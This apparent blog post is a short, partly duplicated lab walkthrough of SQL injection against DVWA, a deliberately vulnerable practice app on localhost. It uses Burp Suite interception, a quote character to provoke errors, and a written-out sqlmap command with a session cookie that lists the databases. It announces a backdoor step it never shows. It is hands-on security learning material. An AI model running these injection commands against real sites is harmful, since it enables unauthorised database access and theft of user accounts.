DVWA is a web which develope for pentest ( Top 10 OWAPS ). In this section explain, to get user account with sqli and password then create backdoor on the server :
Let's play :
Running DVWA
==> Start service of HTTPD and Mysql server.
==> Open mantra browser and change foxyproxy to 127.0.0.1:8080
==> Open url 127.0.0.1 on mantra browser.
==> To read data request--using burpsuite--will capture if intercept on.
==> Using sqlmap to running sqli.
User and password default to enter DVWA:
Username : admin
Password : password
##will work if level security of DVWA is low and medium ( which i have to try ).
==> Open burpsuite, change intercept on before push button submit.
==> Try to enter ' to check error syntax of php.
==> Read information which capture on burpsuite.
==> Start service of HTTPD and Mysql server.
==> Open mantra browser and change foxyproxy to 127.0.0.1:8080
==> Open url 127.0.0.1 on mantra browser.
==> To read data request--using burpsuite--will capture if intercept on.
==> Using sqlmap to running sqli.
User and password default to enter DVWA:
Username : admin
Password : password
##will work if level security of DVWA is low and medium ( which i have to try ).
==> Open burpsuite, change intercept on before push button submit.
==> Try to enter ' to check error syntax of php.
--> #./sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=27&Submit=Submit#" --cookie "security=low; PHPSESSID=10nvojklih9vonbt5tf4thfma3" --dbs
[*] dvwa
[*] information_schema
[*] mysql
==> To see coloum of database dvwa add command above with: -D dvwa --tables --dbs
=== DONE ===
"Keep to learn and try harder"
====================================================================================================================================================
No comments:
Post a Comment